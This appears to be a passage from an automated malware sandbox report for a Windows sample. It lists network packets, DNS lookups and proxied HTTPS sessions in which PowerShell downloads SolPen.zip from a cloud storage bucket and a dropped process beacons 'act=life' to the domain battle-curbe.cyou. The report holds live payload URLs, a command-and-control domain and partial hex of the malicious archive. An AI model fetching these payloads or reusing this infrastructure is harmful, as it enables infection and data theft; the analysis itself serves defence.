Nov 18, 2024 09:59:01.155347109 CET	443	49976	172.67.128.233	192.168.2.11
Nov 18, 2024 09:59:01.773686886 CET	443	49976	172.67.128.233	192.168.2.11
Nov 18, 2024 09:59:01.773998976 CET	49976	443	192.168.2.11	172.67.128.233
Nov 18, 2024 09:59:01.775445938 CET	49976	443	192.168.2.11	172.67.128.233
Nov 18, 2024 09:59:01.775454044 CET	443	49976	172.67.128.233	192.168.2.11
Nov 18, 2024 09:59:01.775696039 CET	443	49976	172.67.128.233	192.168.2.11
Nov 18, 2024 09:59:01.777040005 CET	49976	443	192.168.2.11	172.67.128.233
Nov 18, 2024 09:59:01.777164936 CET	49976	443	192.168.2.11	172.67.128.233
Nov 18, 2024 09:59:01.777198076 CET	443	49976	172.67.128.233	192.168.2.11
Nov 18, 2024 09:59:01.777267933 CET	49976	443	192.168.2.11	172.67.128.233
Nov 18, 2024 09:59:01.777276039 CET	443	49976	172.67.128.233	192.168.2.11
Nov 18, 2024 09:59:02.793435097 CET	443	49976	172.67.128.233	192.168.2.11
Nov 18, 2024 09:59:02.793534994 CET	443	49976	172.67.128.233	192.168.2.11
Nov 18, 2024 09:59:02.793827057 CET	49976	443	192.168.2.11	172.67.128.233
Nov 18, 2024 09:59:02.793827057 CET	49976	443	192.168.2.11	172.67.128.233
Nov 18, 2024 09:59:02.955238104 CET	49978	443	192.168.2.11	172.67.128.233
Nov 18, 2024 09:59:02.955292940 CET	443	49978	172.67.128.233	192.168.2.11
Nov 18, 2024 09:59:02.955455065 CET	49978	443	192.168.2.11	172.67.128.233
Nov 18, 2024 09:59:02.955784082 CET	49978	443	192.168.2.11	172.67.128.233
Nov 18, 2024 09:59:02.955801964 CET	443	49978	172.67.128.233	192.168.2.11
Nov 18, 2024 09:59:03.109555006 CET	49976	443	192.168.2.11	172.67.128.233
Nov 18, 2024 09:59:03.109574080 CET	443	49976	172.67.128.233	192.168.2.11
Nov 18, 2024 09:59:03.689259052 CET	443	49978	172.67.128.233	192.168.2.11
Nov 18, 2024 09:59:03.689330101 CET	49978	443	192.168.2.11	172.67.128.233
Nov 18, 2024 09:59:03.703022957 CET	49978	443	192.168.2.11	172.67.128.233
Nov 18, 2024 09:59:03.703036070 CET	443	49978	172.67.128.233	192.168.2.11
Nov 18, 2024 09:59:03.703273058 CET	443	49978	172.67.128.233	192.168.2.11
Nov 18, 2024 09:59:03.704763889 CET	49978	443	192.168.2.11	172.67.128.233
Nov 18, 2024 09:59:03.705498934 CET	49978	443	192.168.2.11	172.67.128.233
Nov 18, 2024 09:59:03.705502987 CET	443	49978	172.67.128.233	192.168.2.11
Nov 18, 2024 09:59:04.199210882 CET	443	49978	172.67.128.233	192.168.2.11
Nov 18, 2024 09:59:04.199417114 CET	443	49978	172.67.128.233	192.168.2.11
Nov 18, 2024 09:59:04.199651003 CET	49978	443	192.168.2.11	172.67.128.233
Nov 18, 2024 09:59:04.199651003 CET	49978	443	192.168.2.11	172.67.128.233
Nov 18, 2024 09:59:04.500211954 CET	49978	443	192.168.2.11	172.67.128.233
Nov 18, 2024 09:59:04.500236988 CET	443	49978	172.67.128.233	192.168.2.11
Nov 18, 2024 09:59:04.569972038 CET	49979	443	192.168.2.11	172.67.128.233
Nov 18, 2024 09:59:04.570025921 CET	443	49979	172.67.128.233	192.168.2.11
Nov 18, 2024 09:59:04.570146084 CET	49979	443	192.168.2.11	172.67.128.233
Nov 18, 2024 09:59:04.570440054 CET	49979	443	192.168.2.11	172.67.128.233
Nov 18, 2024 09:59:04.570460081 CET	443	49979	172.67.128.233	192.168.2.11
Nov 18, 2024 09:59:05.189584970 CET	443	49979	172.67.128.233	192.168.2.11
Nov 18, 2024 09:59:05.189814091 CET	49979	443	192.168.2.11	172.67.128.233
Nov 18, 2024 09:59:05.191028118 CET	49979	443	192.168.2.11	172.67.128.233
Nov 18, 2024 09:59:05.191040993 CET	443	49979	172.67.128.233	192.168.2.11
Nov 18, 2024 09:59:05.191287994 CET	443	49979	172.67.128.233	192.168.2.11
Nov 18, 2024 09:59:05.194869995 CET	49979	443	192.168.2.11	172.67.128.233
Nov 18, 2024 09:59:05.195609093 CET	49979	443	192.168.2.11	172.67.128.233
Nov 18, 2024 09:59:05.195647955 CET	443	49979	172.67.128.233	192.168.2.11
Nov 18, 2024 09:59:05.195755959 CET	49979	443	192.168.2.11	172.67.128.233
Nov 18, 2024 09:59:05.195785046 CET	443	49979	172.67.128.233	192.168.2.11
Nov 18, 2024 09:59:05.195909977 CET	49979	443	192.168.2.11	172.67.128.233
Nov 18, 2024 09:59:05.195955992 CET	443	49979	172.67.128.233	192.168.2.11
Nov 18, 2024 09:59:05.197679043 CET	49979	443	192.168.2.11	172.67.128.233
Nov 18, 2024 09:59:05.197710991 CET	443	49979	172.67.128.233	192.168.2.11
Nov 18, 2024 09:59:05.201694012 CET	49979	443	192.168.2.11	172.67.128.233
Nov 18, 2024 09:59:05.201736927 CET	443	49979	172.67.128.233	192.168.2.11
Nov 18, 2024 09:59:05.205734968 CET	49979	443	192.168.2.11	172.67.128.233
Nov 18, 2024 09:59:05.205773115 CET	443	49979	172.67.128.233	192.168.2.11
Nov 18, 2024 09:59:05.205782890 CET	49979	443	192.168.2.11	172.67.128.233
Nov 18, 2024 09:59:05.205796957 CET	443	49979	172.67.128.233	192.168.2.11
Nov 18, 2024 09:59:05.205945969 CET	49979	443	192.168.2.11	172.67.128.233
Nov 18, 2024 09:59:05.205971003 CET	443	49979	172.67.128.233	192.168.2.11
Nov 18, 2024 09:59:05.205991030 CET	49979	443	192.168.2.11	172.67.128.233
Nov 18, 2024 09:59:05.206108093 CET	49979	443	192.168.2.11	172.67.128.233
Nov 18, 2024 09:59:05.206127882 CET	49979	443	192.168.2.11	172.67.128.233
Nov 18, 2024 09:59:05.211173058 CET	443	49979	172.67.128.233	192.168.2.11
Nov 18, 2024 09:59:05.213753939 CET	49979	443	192.168.2.11	172.67.128.233
Nov 18, 2024 09:59:05.213793993 CET	443	49979	172.67.128.233	192.168.2.11
Nov 18, 2024 09:59:05.213826895 CET	49979	443	192.168.2.11	172.67.128.233
Nov 18, 2024 09:59:05.213840008 CET	443	49979	172.67.128.233	192.168.2.11
Nov 18, 2024 09:59:05.213854074 CET	49979	443	192.168.2.11	172.67.128.233
Nov 18, 2024 09:59:05.213861942 CET	443	49979	172.67.128.233	192.168.2.11
Nov 18, 2024 09:59:05.213990927 CET	49979	443	192.168.2.11	172.67.128.233
Nov 18, 2024 09:59:05.214003086 CET	443	49979	172.67.128.233	192.168.2.11
Nov 18, 2024 09:59:07.085184097 CET	443	49979	172.67.128.233	192.168.2.11
Nov 18, 2024 09:59:07.085293055 CET	443	49979	172.67.128.233	192.168.2.11
Nov 18, 2024 09:59:07.085366964 CET	49979	443	192.168.2.11	172.67.128.233
Nov 18, 2024 09:59:07.085580111 CET	49979	443	192.168.2.11	172.67.128.233
Nov 18, 2024 09:59:07.085608959 CET	443	49979	172.67.128.233	192.168.2.11
Nov 18, 2024 09:59:07.089577913 CET	49980	443	192.168.2.11	172.67.128.233
Nov 18, 2024 09:59:07.089622974 CET	443	49980	172.67.128.233	192.168.2.11
Nov 18, 2024 09:59:07.090137005 CET	49980	443	192.168.2.11	172.67.128.233
Nov 18, 2024 09:59:07.090137005 CET	49980	443	192.168.2.11	172.67.128.233
Nov 18, 2024 09:59:07.090172052 CET	443	49980	172.67.128.233	192.168.2.11
Nov 18, 2024 09:59:07.692126036 CET	443	49980	172.67.128.233	192.168.2.11
Nov 18, 2024 09:59:07.692256927 CET	49980	443	192.168.2.11	172.67.128.233
Nov 18, 2024 09:59:07.693586111 CET	49980	443	192.168.2.11	172.67.128.233
Nov 18, 2024 09:59:07.693592072 CET	443	49980	172.67.128.233	192.168.2.11
Nov 18, 2024 09:59:07.693939924 CET	443	49980	172.67.128.233	192.168.2.11
Nov 18, 2024 09:59:07.695257902 CET	49980	443	192.168.2.11	172.67.128.233
Nov 18, 2024 09:59:07.695257902 CET	49980	443	192.168.2.11	172.67.128.233
Nov 18, 2024 09:59:07.695328951 CET	443	49980	172.67.128.233	192.168.2.11
Nov 18, 2024 09:59:08.525863886 CET	443	49980	172.67.128.233	192.168.2.11
Nov 18, 2024 09:59:08.525978088 CET	443	49980	172.67.128.233	192.168.2.11
Nov 18, 2024 09:59:08.526082039 CET	49980	443	192.168.2.11	172.67.128.233
Nov 18, 2024 09:59:08.526161909 CET	49980	443	192.168.2.11	172.67.128.233
Nov 18, 2024 09:59:08.526161909 CET	49980	443	192.168.2.11	172.67.128.233
Nov 18, 2024 09:59:08.526176929 CET	443	49980	172.67.128.233	192.168.2.11
Nov 18, 2024 09:59:08.526185989 CET	443	49980	172.67.128.233	192.168.2.11

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 18, 2024 09:58:09.317173004 CET	64177	53	192.168.2.11	1.1.1.1
Nov 18, 2024 09:58:09.504137039 CET	53	64177	1.1.1.1	192.168.2.11
Nov 18, 2024 09:58:19.807008028 CET	51222	53	192.168.2.11	1.1.1.1
Nov 18, 2024 09:58:19.817056894 CET	53	51222	1.1.1.1	192.168.2.11
Nov 18, 2024 09:58:54.270335913 CET	56267	53	192.168.2.11	1.1.1.1
Nov 18, 2024 09:58:54.279495001 CET	53	56267	1.1.1.1	192.168.2.11

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 18, 2024 09:58:09.317173004 CET	192.168.2.11	1.1.1.1	0xce70	Standard query (0)	storageinstance.oss-ap-southeast-1.aliyuncs.com	A (IP address)	IN (0x0001)	false
Nov 18, 2024 09:58:19.807008028 CET	192.168.2.11	1.1.1.1	0xe605	Standard query (0)	QbeMCwQrsKPS.QbeMCwQrsKPS	A (IP address)	IN (0x0001)	false
Nov 18, 2024 09:58:54.270335913 CET	192.168.2.11	1.1.1.1	0xf177	Standard query (0)	battle-curbe.cyou	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 18, 2024 09:58:03.803647995 CET	1.1.1.1	192.168.2.11	0xe588	No error (0)	shed.dual-low.s-part-0017.t-0009.t-msedge.net	s-part-0017.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 18, 2024 09:58:03.803647995 CET	1.1.1.1	192.168.2.11	0xe588	No error (0)	s-part-0017.t-0009.t-msedge.net		13.107.246.45	A (IP address)	IN (0x0001)	false
Nov 18, 2024 09:58:09.504137039 CET	1.1.1.1	192.168.2.11	0xce70	No error (0)	storageinstance.oss-ap-southeast-1.aliyuncs.com		47.79.48.182	A (IP address)	IN (0x0001)	false
Nov 18, 2024 09:58:19.817056894 CET	1.1.1.1	192.168.2.11	0xe605	Name error (3)	QbeMCwQrsKPS.QbeMCwQrsKPS	none	none	A (IP address)	IN (0x0001)	false
Nov 18, 2024 09:58:54.279495001 CET	1.1.1.1	192.168.2.11	0xf177	No error (0)	battle-curbe.cyou		172.67.128.233	A (IP address)	IN (0x0001)	false
Nov 18, 2024 09:58:54.279495001 CET	1.1.1.1	192.168.2.11	0xf177	No error (0)	battle-curbe.cyou		104.21.2.80	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

storageinstance.oss-ap-southeast-1.aliyuncs.com

battle-curbe.cyou

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.11	49728	47.79.48.182	443	7780	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-18 08:58:10 UTC	215	OUT	GET /link/process/SolPen.zip HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: storageinstance.oss-ap-southeast-1.aliyuncs.com Connection: Keep-Alive
2024-11-18 08:58:11 UTC	553	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Mon, 18 Nov 2024 08:58:11 GMT Content-Type: application/zip Content-Length: 1022516 Connection: close x-oss-request-id: 673B01A35F471E323805FA2A Accept-Ranges: bytes ETag: "2E3BD9F234997A2489194438B013A61B" Last-Modified: Sun, 17 Nov 2024 16:42:19 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 13364016481960367728 x-oss-storage-class: Standard x-oss-ec: 0048-00000113 Content-Disposition: attachment x-oss-force-download: true Content-MD5: LjvZ8jSZeiSJGUQ4sBOmGw== x-oss-server-time: 2
2024-11-18 08:58:11 UTC	15831	IN	Data Raw: 50 4b 03 04 14 00 00 00 08 00 61 37 71 59 96 d2 87 ac 9a 99 0f 00 7a 28 a0 00 0a 00 00 00 53 6f 6c 50 65 6e 2e 65 78 65 ec fd 07 58 13 5b d7 30 0c 4f 42 80 50 83 02 8a 0a 4a b3 82 18 08 2d 84 a6 10 04 0f 68 34 92 88 0a 8a 14 43 44 40 48 14 54 14 0c a8 31 62 ef c7 86 bd 77 05 cb 51 b0 81 1d 1b 7a 2c 47 ec 83 a0 a2 22 a2 a2 f3 af bd 27 20 7a 9f bb 3c cf f5 7e ff fb 5d df 75 8f ee cc cc 2e 6b af bd f6 6a bb 0d 11 c3 17 10 3a 04 41 b0 20 50 14 41 14 13 f4 15 48 fc fb ab 02 82 69 97 63 a6 c4 21 83 2b 76 c5 8c f0 2b 76 43 65 49 19 b6 69 e9 a9 63 d3 63 c7 db c6 c5 a6 a4 a4 2a 6c c7 24 d8 a6 2b 53 6c 93 52 6c 83 07 89 6d c7 a7 c6 27 b8 98 98 18 3a 6a 61 f4 9d 72 7d 9c 6e c7 53 de cd c1 78 8c af b7 1e be 3b 7b 5b e0 b8 93 de db e1 de 79 96 a5 b7 01 be 77 f5 66 e1 Data Ascii: PKa7qYz(SolPen.exeX[0OBPJ-h4CD@HT1bwQz,G"' z<~]u.kj:A PAHic!+v+vCeIicc*l$+SlRlm':jar}nSx;{[ywf
2024-11-18 08:58:11 UTC	16384	IN	Data Raw: cd a5 4c 75 a4 71 7e 25 27 ef 16 03 6d 50 a9 e4 cc bc 8a 54 56 11 43 53 a7 b9 5b 4a b2 73 9f 52 78 79 a8 de 04 ed b6 d1 dc 54 0b eb 72 2f e2 23 51 a5 cc 62 26 40 c8 7d 41 4d 47 53 f8 b5 ea 48 12 9f e8 45 0b 97 1d d1 62 38 33 06 fc 31 cc 42 59 d6 47 59 c3 11 f8 52 45 5b 55 76 bd 83 02 dc b8 7a 17 85 9e 2a c1 98 de 5e 82 6c 96 0a 7f 7a 80 50 e8 c8 59 31 79 f7 b3 7c d0 84 4e a0 08 8f 95 a5 aa a7 01 05 ac 61 22 d9 be a5 68 87 19 1a 8c af fd 88 1c 94 00 18 1c ad c2 e7 3f ea a5 24 9a 76 ad 46 a7 41 54 5f bb 2a 4d e9 2f f3 81 6b 89 0e 39 67 a8 be 3a 2a e5 cd 51 db 30 97 d5 0c 2f 44 07 15 78 17 06 02 5a 56 e8 f3 ba e6 d2 c1 60 cd 0e 93 da f9 e5 0a b4 6b 04 7d ef b4 55 9c e5 02 5a f9 76 a0 67 6e 73 68 05 a7 b9 4b ef bb c9 bf af f5 78 60 98 b0 01 61 a7 18 08 0d ed Data Ascii: Luq~%'mPTVCS[JsRxyTr/#Qb&@}AMGSHEb831BYGYRE[Uvz^lzPY1y\|Na"h?$vFAT_M/k9g:*Q0/DxZV`k}UZvgnshKx`a
2024-11-18 08:58:11 UTC	16384	IN	Data Raw: bc ec dc 38 83 a1 67 51 79 7f 99 bc 7d 09 63 c6 9d 90 f7 ae 8e 3d 86 a4 fa 8e b7 c9 63 0f 73 75 13 9a ef d9 3b bb 53 c5 93 e8 b1 19 5e 49 73 0c 04 be 33 e3 5d 27 13 31 be 11 c2 83 77 4e ed 2b dd dc 61 e2 99 63 1e 56 a3 86 ad ab 4f 36 3f db bd 6b 29 eb c2 97 8b 9e 9c be 27 dd 88 a3 4b b6 b7 b9 70 36 c2 d9 ec a3 f1 f6 b1 11 73 e2 9f 17 18 14 dd 1f 3a 66 eb a2 a4 eb db 64 06 b1 6d dc 3e 0c e1 3c 5e d5 cd 68 cc 1d 93 02 8f c7 e2 3b bc 11 67 37 8b c7 df bf 5e 58 75 49 67 ea fb 62 c5 e0 65 f7 c7 f5 e0 1e 2c 1d b3 66 cb 2c d1 03 bb 3e 8a 60 47 ce d0 b9 8f 8a eb a5 e1 96 82 3e 5d 67 8b b2 42 03 d2 06 df 1d b5 76 a0 65 57 86 c9 a6 c3 57 43 a3 b7 8e ae bb 77 61 55 ff 33 39 1d 14 ed ca d2 35 23 96 de ea 69 f2 c9 79 e3 ef 5d 4f 5e e1 3f a1 a6 84 ec 99 7a 34 95 94 1f Data Ascii: 8gQy}c=csu;S^Is3]'1wN+acVO6?k)'Kp6s:fdm><^h;g7^XuIgbe,f,>`G>]gBveWWCwaU395#iy]O^?z4
2024-11-18 08:58:11 UTC	16384	IN	Data Raw: 20 ca 03 be 9e 1e f9 e9 80 f5 6c f1 9d 95 fd 40 84 33 22 db 9d 83 11 b3 0b 51 7e 12 1a fe 0b e1 f5 57 05 46 e4 24 cd 37 6e cd 00 b0 9a 4d 8b ce 8c e7 10 60 92 5e b5 85 4f 26 d6 af 4e b9 c2 8c fa 8b 9f 98 52 c2 ae 2a d5 86 29 b2 b3 97 4f 4b 77 2b 67 30 1d da cd dd fb 12 39 82 ca 1f 42 34 41 64 03 6b 98 20 fc 51 8d 5e c7 81 83 8e 34 9b 96 b9 dc 91 7b 3b 1f 11 01 26 db 74 35 c2 b2 6d b5 aa 2d db 27 3d 48 31 be 37 00 47 b1 d3 91 63 e1 55 40 04 8c 9f 4e 00 a9 10 1f 04 9b d2 39 8b 98 cf 9a 91 1c d1 84 ea e2 af 4b 69 d1 e1 be d0 0d c2 5c 4c 9f 09 de 7b 0e 06 23 08 98 3c fb 8f 72 c6 58 e8 6d 74 96 e5 13 01 cb cc ad bc 52 6d ae f2 ff ff b1 e4 ac 18 44 4c 40 cc 2e 63 8c 6f 7e 06 b1 79 8e 2f 46 8d 40 78 67 e3 f6 d6 2e 46 18 94 5f fd c3 f4 03 dd 83 91 65 a7 7f 13 c2 Data Ascii: l@3"Q~WF$7nM`^O&NR*)OKw+g09B4Adk Q^4{;&t5m-'=H17GcU@N9Ki\L{#<rXmtRmDL@.co~y/F@xg.F_e
2024-11-18 08:58:11 UTC	16384	IN	Data Raw: e1 4c 28 ac 37 44 3a be 6a 4a 25 7c 2a 6f 55 d9 bb 27 ff fc 58 e7 62 7a 6e 19 12 77 23 fe 55 3b 9f 54 a9 fa 33 a6 53 a6 e3 73 17 66 ae 68 1a ca 30 6b 68 0a a8 9e 14 d2 15 13 fc e2 a5 0e 38 7b 45 85 b2 9d 07 d9 a3 3b 73 70 38 aa 36 9c 4c d1 ed 43 f2 79 be ad 97 13 9b fc d8 f1 39 33 f8 04 a2 80 a4 79 4b 01 0d da 34 c6 62 0e 1a 89 e2 a1 ef 2c 55 82 fa 31 5d 81 f1 05 51 c0 a6 3a 95 90 6a e5 ac 3b e1 0e 3b 2b 85 51 04 70 90 e2 3f f1 6d 5c 27 dc d0 d3 b1 87 a8 66 1e 20 5e 05 58 bb fd 88 26 b8 e2 20 c9 4a 3a 58 44 5f f3 e9 8f 7d e7 76 d0 5c a9 c4 7c f7 97 a8 e3 6d b4 93 b3 4d 62 fa d0 28 0f ec ef ac c3 96 98 b9 be ed bf ee cf 9e a3 dc 72 ac 1b 9b 07 06 9d de ce a5 62 fb b6 46 ee 66 49 6f 4f 6c bb 7d 7c c8 91 63 0b e4 c1 24 8e 48 2d 33 9b 73 45 ff 8b 38 a7 dc 3a Data Ascii: L(7D:jJ%\|*oU'Xbznw#U;T3Ssfh0kh8{E;sp86LCy93yK4b,U1]Q:j;;+Qp?m\'f ^X& J:XD_}v\\|mMb(rbFfIoOl}\|c$H-3sE8:
2024-11-18 08:58:11 UTC	16384	IN	Data Raw: 79 2a 77 b4 54 20 e9 1d 83 d0 35 5d 31 e1 09 f6 34 ca 24 87 05 ba bf 3f 1b 07 d5 1d 83 19 af 5f 17 0a 0a 3c 5f 45 7c 51 b1 ab e1 bf 28 dc 68 7b 0d 2c 8a c0 da 4c 1b bd f6 10 bd a6 dd 78 b5 20 eb 00 33 24 f5 38 d1 1f 02 e0 19 d9 50 41 44 30 43 58 e8 15 1e 38 d9 29 c6 8e d6 fb 85 d4 c9 f5 eb 26 a5 c3 06 8c f5 3a 8f de 02 17 74 86 75 48 13 6b 53 49 b1 74 e2 d1 e5 61 13 0a 6e 1d 51 46 37 df 2a f1 3c c3 78 7b 3f be 4b 51 b9 3c 52 4d 69 e8 1c 5e dd 19 b3 e8 ac ad b7 79 03 9a 7e 3f cc ef 65 be b4 f7 07 8d 20 3c bd d7 8e 8e 30 e7 d5 f0 79 86 db 96 de 18 bb ec 71 e3 a5 71 b5 ea d8 0b ca 4f 08 2c e7 a8 e8 f0 54 43 cf 9e 5d 10 ad b4 49 43 9e b5 4d c5 05 1b 30 71 ab ab 5e be 16 53 04 09 80 05 e7 ca 09 e8 f4 9d 06 af 3b 77 e7 00 09 3f 14 4c 00 25 4f d7 28 ee 08 18 3b Data Ascii: ywT 5]14$?_<_E\|Q(h{,Lx 3$8PAD0CX8)&:tuHkSItanQF7<x{?KQ<RMi^y~?e <0yqqO,TC]ICM0q^S;w?L%O(;
2024-11-18 08:58:11 UTC	16384	IN	Data Raw: 59 b4 f7 13 e0 a4 94 c0 f3 d9 78 53 31 03 2c dc fd 5e 4c cb dc 6e a2 2c 24 15 45 5f c5 9b 8e 65 9c e6 13 76 af de 58 ec 03 aa 72 24 34 ff c7 22 5d 62 50 cd 95 06 4b 59 aa 25 c5 2b be b2 ed c0 d5 33 fc 45 37 6f 24 da cb 4e 9a a9 f7 d4 c2 49 71 26 ca ad 3a 4d 52 02 37 72 c5 7a bc 01 ef 61 06 3f 36 61 dd b8 cf 11 ee bc 6e 68 94 db 49 de 1e 2b 56 0e b1 28 f2 7a e4 c0 3f 9d fb 24 c8 db 73 fa 91 0f 48 45 4c b9 31 dd e6 3c 55 96 a0 57 20 1e 6e c0 ea 46 57 ea fb b4 b9 bb 63 89 63 40 2e 51 a9 f1 59 98 f6 15 ee 88 de 2d 3a 93 30 55 c4 ab be 3b d3 8a 21 70 8e 48 98 74 2f 6c 09 4c 78 b2 fa 57 5b 9b c6 27 f5 72 ac 25 9a ed 3a a6 43 4d c9 8e 0f c1 22 e8 37 f0 9b 1f 6c 98 47 2b 20 dd 50 ed 51 c9 e2 91 df ed 4b c8 75 22 db f2 05 50 23 3a 84 03 53 72 3e f0 f3 47 13 52 26 Data Ascii: YxS1,^Ln,$E_evXr$4"]bPKY%+3E7o$NIq&:MR7rza?6anhI+V(z?$sHEL1<UW nFWcc@.QY-:0U;!pHt/lLxW['r%:CM"7lG+ PQKu"P#:Sr>GR&
2024-11-18 08:58:11 UTC	16384	IN	Data Raw: e3 bf 7f 0b 1e 8b ae 84 1e 28 5f 22 cb 30 a7 1d 4d 1a ae 4a ef 54 0c c2 ec 1e a6 a6 ca 15 51 6c 72 81 cd 81 74 cc ac 99 39 4c ed 5c 83 97 e7 95 60 40 90 6d 24 ae ef d3 63 9c 12 24 c5 a9 f8 53 f7 e8 50 05 a9 df cd 35 99 b3 5f fb 00 53 6c 2d 8c 07 c0 3c 53 75 15 1f 27 9a 60 a6 09 f1 dd 06 99 c6 c9 0c 1d f9 5f d9 22 29 c4 07 a9 50 d8 c1 90 62 95 7c cc 78 6b 4f d8 62 dd bc 79 43 fb b1 dc 2b ab f0 bf 67 97 1e ba 39 fd 0b 5d 9e e6 38 83 8f 1d 62 16 6b 36 4a 70 cf 04 48 c2 22 3f 67 b8 ed bd 0a 0a 3d 5d fd 45 24 a8 c0 83 fe eb 4d a6 d9 ba bb 6f 9f 1a 02 82 5d 53 4c 52 49 f6 52 22 f4 da 20 ed 07 c5 8f 4c 26 4f cc f0 53 5f 8e b7 0f 3e da bd 38 fe 8a dd ba 34 17 34 99 c5 78 3f e3 55 a6 fd 73 f9 ac 00 6b db 14 88 38 a0 92 6b 3b ef 49 ff d7 3c 60 e2 9e cf c1 d8 64 01 Data Ascii: (_"0MJTQlrt9L\`@m$c$SP5_Sl-<Su'`_")Pb\|xkObyC+g9]8bk6JpH"?g=]E$Mo]SLRIR" L&OS_>844x?Usk8k;I<`d
2024-11-18 08:58:11 UTC	16384	IN	Data Raw: 0c 47 02 78 68 9d cc 3f e6 15 01 d7 dd 94 5c 81 f2 78 12 e4 dd 7c 68 09 92 f1 f2 b2 fc 87 cb bd 8c d7 e0 20 c4 95 d1 9e 20 30 1d db bf 8f b0 fe 94 ed 17 b3 ca 13 91 88 1c 27 0e 0f ba fc f4 72 23 3c 97 e2 2b 84 de 95 6e 5d 04 9b 0e e0 2c 83 52 c3 d3 b6 ea 08 ff 9e 0f b9 a8 dc 6b 8c 19 f2 25 8f 28 d4 8c 7d f8 26 fd ad 01 d7 03 57 e1 66 91 2f 18 4b 4d 4d 46 08 eb 1c eb 6b 0f 25 cf c9 63 6b 26 13 07 19 cc 0d 11 33 ba 96 3c f4 f5 64 74 f8 be 08 64 fd 2e dc ea 68 4f ae e2 d6 c4 7d 46 a1 c9 af 32 3b d7 08 0b ce 4a 9d 70 1f 88 64 82 4e ec 5c 13 81 72 9e 96 99 d0 91 6d 62 25 b3 3a 08 96 16 25 88 42 8f e8 af bc ed dd 2d f7 e7 19 24 ed fe 6e 1d 2c 8b 8f db 79 64 ff 16 3f 35 cb 7a bf bd 29 1a 77 4a 57 ac ae 17 bc 7d 1d c3 c5 27 e3 ac ad bb 1a c7 72 c4 36 45 2e 56 3e Data Ascii: Gxh?\x\|h 0'r#<+n],Rk%(}&Wf/KMMFk%ck&3<dtd.hO}F2;JpdN\rmb%:%B-$n,yd?5z)wJW}'r6E.V>
2024-11-18 08:58:11 UTC	16384	IN	Data Raw: 5b c2 e6 68 d4 e4 0d 85 75 7b 7b 59 21 4f 7b 94 5a 28 d5 78 57 37 e6 b7 2f 1a cb 3a ce 95 73 02 bc 21 0a 84 6a ad 94 07 23 1c c6 23 c2 ab 8b 6a 56 e9 36 3c 7e ba dc cb 3f 20 f9 f9 99 60 a3 d7 58 66 cf 3c 47 2f 8e 06 d9 16 72 85 ad de 91 80 d6 80 0a aa 1e 23 38 9a fb 2b af 31 1c 89 00 f7 12 cd 10 79 e9 04 dd 1e 67 a6 c9 83 3b 2c 43 9f b1 29 67 c9 a6 a0 7b 44 b2 2e ac 7f c3 1a 82 9f 4f bc 89 0f a1 f2 ed ad c5 57 b7 36 25 1e a5 f6 99 e6 af a3 3e 50 9d a4 d2 26 dd 43 88 14 58 3b 19 32 59 80 d8 02 40 6f 60 cf 07 85 98 f4 40 88 6c d3 93 bb 71 af e9 5a c5 8d 5f d1 f7 41 b1 e2 af 43 4e f4 d7 a4 1f a4 e3 92 67 52 68 f7 ee c8 fa 04 fd ae 67 91 b4 fc 99 3e 09 be b7 5f e1 c0 5a 12 fa e4 b2 23 a1 3d 9d aa ba a4 44 72 96 48 24 f1 de dd f6 55 94 6d 5c 16 51 18 0a f6 f9 Data Ascii: [hu{{Y!O{Z(xW7/:s!j##jV6<~? `Xf<G/r#8+1yg;,C)g{D.OW6%>P&CX;2Y@o`@lqZ_ACNgRhg>_Z#=DrH$Um\Q

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.11	49972	172.67.128.233	443	1080	C:\Users\user\AppData\Local\Temp\701961\Puts.com

Timestamp	Bytes transferred	Direction	Data
2024-11-18 08:58:54 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: battle-curbe.cyou
2024-11-18 08:58:54 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-11-18 08:58:55 UTC	1015	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 08:58:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=3kr8rfrr296c9c26296ml97rrc; expires=Fri, 14-Mar-2025 02:45:34 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UrXmN3vyzRYnFXfvMyVadQKgbbYuu4cV5v2QUGWjCqdNg4TkGqoGCYCPX8fOGIA89TtJFu2FG9yngnqDN96AD%2F4%2FnkShelzJhPA6sC198GN%2FzS0SethIYmMTQG4AVqhIFzU4xA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e46c2edfabceb16-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1105&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=908&delivery_rate=2639927&cwnd=250&unsent_bytes=0&cid=f8c1a4a7bd447279&ts=652&x=0"
2024-11-18 08:58:55 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-11-18 08:58:55 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
